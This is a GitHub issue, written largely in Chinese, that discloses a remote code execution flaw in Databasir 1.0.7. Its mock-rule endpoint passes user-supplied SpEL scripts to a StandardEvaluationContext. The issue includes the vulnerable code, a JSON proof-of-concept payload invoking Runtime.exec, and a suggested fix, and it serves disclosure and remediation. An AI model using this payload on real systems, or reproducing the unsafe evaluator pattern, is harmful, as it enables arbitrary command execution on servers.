Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

database-1.0.7 存在RCE漏洞 #269

Closed
luelueking opened this issue Feb 13, 2023 · 0 comments · Fixed by #270
Closed

database-1.0.7 存在RCE漏洞 #269

luelueking opened this issue Feb 13, 2023 · 0 comments · Fixed by #270

Comments

@luelueking
Copy link
Contributor

luelueking commented Feb 13, 2023

影响

Databasir is a team-oriented relational database model document management platform.
Databasir 1.0.7 has remote code execution vulnerability.
Remote code execution vulnerability is a Web security vulnerability, we can execute any command, such as open -a Calculator

不安全的代码

SpelScriptEvaluator使用了StandardEvaluationContext作为context,script参数可控并且没有任何过滤

SimpleEvaluationContext - 针对不需要 SpEL 语言语法的全部范围并且应该受到有意限制的表达式类别,公开 Spal 语言特性和配置选项的子集。

StandardEvaluationContext - 公开全套 SpEL 语言功能和配置选项。您可以使用它来指定默认的根对象并配置每个可用的评估相关策略。

@Component
@RequiredArgsConstructor
public class SpelScriptEvaluator implements MockScriptEvaluator {

    private final SpelExpressionParser spelExpressionParser = new SpelExpressionParser();

    @Override
    public String evaluate(String script, ScriptContext context) {
        Expression expression = spelExpressionParser.parseExpression(script);
        StandardEvaluationContext spelContext = new StandardEvaluationContext(context);
        return expression.getValue(spelContext, String.class);
    }
}

漏洞入口

在进行rules校验时

    @PreAuthorize("hasAnyAuthority('SYS_OWNER', 'GROUP_OWNER?groupId='+#groupId, 'GROUP_MEMBER?groupId='+#groupId)")
    @Operation(summary = "保存 Mock Rule")
    @AuditLog(module = AuditLog.Modules.PROJECT, name = "保存 Mock Rule",
            involvedProjectId = "#projectId",
            involvedGroupId = "#groupId")
    @PostMapping(Routes.MockData.SAVE_MOCK_RULE)
    public JsonData<Void> saveMockRules(@PathVariable Integer groupId,
                                        @PathVariable Integer projectId,
                                        @PathVariable Integer tableId,
                                        @RequestBody @Valid List<ColumnMockRuleSaveRequest> rules) {
        mockDataService.saveMockRules(projectId, tableId, rules);
        return JsonData.ok();
    }

POC

攻击者可以控制rules的参数来造成rce,例如:

[
  {
    "columnName": "test",
    "dependentColumnName": "test",
    "dependentTableName": "test",
    "mockDataScript": "T(java.lang.String).forName('java.lang.Runtime').getRuntime().exec('open -a Calculator')",
    "mockDataType": "SCRIPT",
    "tableName": "test"
  }
]

在这里插入图片描述

修复建议

最直接的方式:使用SimpleEvaluationContext来替换StandardEvaluationContext

报告人

@luelueking

来源

https://github.com/luelueking/Databasir-1.0.7-vuln-poc

@vran-dev vran-dev linked a pull request Mar 3, 2023 that will close this issue
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

Successfully merging a pull request may close this issue.

1 participant